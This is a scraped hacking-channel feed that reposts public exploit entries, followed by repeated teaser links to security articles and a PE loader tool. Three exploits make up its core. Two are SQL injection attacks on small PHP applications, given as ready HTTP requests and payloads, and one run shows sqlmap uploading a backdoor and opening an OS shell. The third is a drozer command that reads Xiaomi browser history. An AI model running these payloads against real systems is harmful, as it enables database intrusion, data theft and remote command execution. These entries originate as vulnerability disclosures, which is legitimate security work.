Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
RATES SYSTEM 1.0 SQL Injection
https://3.bp.blogspot.com/-ZdpKmdYlHbY/WWlu_uhv-yI/AAAAAAAAIKA/GrhbPhfNXpolamaXsSLRo9Cb0FKriXUgQCLcBGAs/s1600/h12.png
RATES SYSTEM version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
RATES SYSTEM 1.0 SQL Injection
https://3.bp.blogspot.com/-ZdpKmdYlHbY/WWlu_uhv-yI/AAAAAAAAIKA/GrhbPhfNXpolamaXsSLRo9Cb0FKriXUgQCLcBGAs/s1600/h12.png
RATES SYSTEM version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
d472f87d486080efe5d62e3a79b12767Download
# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
# Date: 11-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
# Version: V1.0
# Category: Webapps
# Tested on: Linux/Windows
# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
# Vulnerable Request:
POST /register.php HTTP/1.1
Host: localhost
Content-Length: 70
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
Connection: close
ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456®ister=
# Vulnerable Payload:
# Parameter: ClientId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=®ister=oQCR
--------------------------------------------------------------------------------------------------------------------------
# Vulnerable Request:
POST /passwordreset.php HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/passwordreset.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
Connection: close
loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
# Vulnerable Payload:
# Parameter: loginId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
RATES SYSTEM 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Xiaomi 10.2.4.g Information Disclosure
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Xiaomi browser version 10.2.4.g suffers from a browser search history disclosure vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Xiaomi 10.2.4.g Information Disclosure
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Xiaomi browser version 10.2.4.g suffers from a browser search history disclosure vulnerability.
MD5 |
9dea490704dc2785ee1fa573e8494850Download
# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure
# Date: 27-Dec-2018
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.mi.com/us
# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/
# Version: 10.2.4.g
# Tested on: Tested in Android Version: 8.1.0
# CVE : CVE-2018-20523
*summary: *
Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history.
*Vulnerable component:* com.android.browser.searchhistory
*Poc:*
adb forward tcp:31415 tcp:31415
drozer console connect
drozer > run app.provider.query
content://com.android.browser.searchhistory/searchhistory
*Blogpost:*
https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Xiaomi 10.2.4.g Information Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
COVID19 Testing Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-rlkVZrkp7Nk/WWlvMMd1AsI/AAAAAAAAIMM/kgTZoxpDP8Ypbt5o2Ma3tAKenLk3_TLPQCLcBGAs/s1600/h18.png
COVID19 Testing Management System version 1.0 suffers from a remote SQL injection vulnerability leveraging the searchdata parameter on the patient-search-report.php page. This is a variant of the original discovery of SQL injection in this version as discovered by Rohit Burke in May of 2021.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
COVID19 Testing Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-rlkVZrkp7Nk/WWlvMMd1AsI/AAAAAAAAIMM/kgTZoxpDP8Ypbt5o2Ma3tAKenLk3_TLPQCLcBGAs/s1600/h18.png
COVID19 Testing Management System version 1.0 suffers from a remote SQL injection vulnerability leveraging the searchdata parameter on the patient-search-report.php page. This is a variant of the original discovery of SQL injection in this version as discovered by Rohit Burke in May of 2021.
MD5 |
b36fd4281ed2835482616a0d0da9e478Download
# Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
# Google Dork: intitle: "COVID19 Testing Management System"
# Date: 09/08/2021
# Exploit Author: Ashish Upsham
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
Description:
The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
==================== 1. SQLi ====================
http://192.168.0.107:80/covid-tms/patient-search-report.php
The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
user has the full ability to run system commands via --os-shell and fully compromise the system
POST parameter 'searchdata' is vulnerable.
step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
step 2 : Now copy the post request and save it as test.txt file.
step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
----------------------------------------------------------------------
Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
[19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
[19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
[19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
[19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'laptop-ashish\ashish'
os-shell>
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
COVID19 Testing Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
WAF bypasses: Tearing down the wall
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…Continue reading on InfoSec Write-ups »
Read more...
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…Continue reading on InfoSec Write-ups »
Read more...
How I collected sensitive data from examination software?
Hey Guyz! I am back with a new vulnerability on a college website.Continue reading on InfoSec Write-ups »
Read more...
Hey Guyz! I am back with a new vulnerability on a college website.Continue reading on InfoSec Write-ups »
Read more...
How I collected sensitive data from examination software?
Hey Guyz! I am back with a new vulnerability on a college website.
Read more...
Hey Guyz! I am back with a new vulnerability on a college website.
Read more...
Huan: PE Loader
https://www.reddit.com/r/redteamsec/comments/p38ag5/huan_pe_loader/
Simple Encrypted PE Loader Generator: https://github.com/frkngksl/Huan submitted by /u/DarkGrejuva (https://www.reddit.com/user/DarkGrejuva)
[link] (https://www.reddit.com/r/redteamsec/comments/p38ag5/huan_pe_loader/) [comments] (https://www.reddit.com/r/redteamsec/comments/p38ag5/huan_pe_loader/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/p38ag5/huan_pe_loader/
Simple Encrypted PE Loader Generator: https://github.com/frkngksl/Huan submitted by /u/DarkGrejuva (https://www.reddit.com/user/DarkGrejuva)
[link] (https://www.reddit.com/r/redteamsec/comments/p38ag5/huan_pe_loader/) [comments] (https://www.reddit.com/r/redteamsec/comments/p38ag5/huan_pe_loader/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Huan: PE Loader
Simple Encrypted PE Loader Generator: [https://github.com/frkngksl/Huan](https://github.com/frkngksl/Huan)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What is hacking ? Types of hacking and more facts about hacking | TECH STRAP
The term ‘hacking’ and ‘hacker’ have various interpretations according to various sources. In an ideal sense, the term hacker was used to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is hacking ? Types of hacking and more facts about hacking | TECH STRAP
The term ‘hacking’ and ‘hacker’ have various interpretations according to various sources. In an ideal sense, the term hacker was used to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is hacking ? Types of hacking and more facts about hacking | TECH STRAP
The term ‘hacking’ and ‘hacker’ have various interpretations according to various sources. In an ideal sense, the term hacker was used to…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
WHAT IS DARK WEB AND DEEP WEB
What is the deep web?
The deep web is an umbrella term for parts of the internet not fully accessible using standard search engines such…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
WHAT IS DARK WEB AND DEEP WEB
What is the deep web?
The deep web is an umbrella term for parts of the internet not fully accessible using standard search engines such…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
WHAT IS DARK WEB AND DEEP WEB
What is the deep web? The deep web is an umbrella term for parts of the internet not fully accessible using standard search engines such…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
WAF bypasses: Tearing down the wall
https://cdn-images-1.medium.com/max/1300/1*RbFWdVggszxS3GKvHq_r5g.jpeg
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
WAF bypasses: Tearing down the wall
https://cdn-images-1.medium.com/max/1300/1*RbFWdVggszxS3GKvHq_r5g.jpeg
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
WAF bypasses: Tearing down the wall
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How I collected sensitive data from examination software?
https://cdn-images-1.medium.com/max/1027/1*ydmJz7rJFr4C-18zvgPisg.png
Hey Guyz! I am back with a new vulnerability on a college website.
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
How I collected sensitive data from examination software?
https://cdn-images-1.medium.com/max/1027/1*ydmJz7rJFr4C-18zvgPisg.png
Hey Guyz! I am back with a new vulnerability on a college website.
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I collected sensitive data from examination software?
Hey Guyz! I am back with a new vulnerability on a college website.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to Hack Instagram? Account Hacking Precautions
https://cdn-images-1.medium.com/max/2600/0*KRISFXiv-78XnWll
If you can’t log in to Instagram, you may be experiencing an account hacking problem. Even phenomenal people have had hacking problems…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to Hack Instagram? Account Hacking Precautions
https://cdn-images-1.medium.com/max/2600/0*KRISFXiv-78XnWll
If you can’t log in to Instagram, you may be experiencing an account hacking problem. Even phenomenal people have had hacking problems…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Hack Instagram? Account Hacking Precautions
If you can’t log in to Instagram, you may be experiencing an account hacking problem. Even phenomenal people have had hacking problems…
Http-Request-Smuggling - HTTP Request Smuggling Detection Tool
http://www.kitploit.com/2021/08/http-request-smuggling-http-request.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/08/http-request-smuggling-http-request.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Http-Request-Smuggling - HTTP Request Smuggling Detection Tool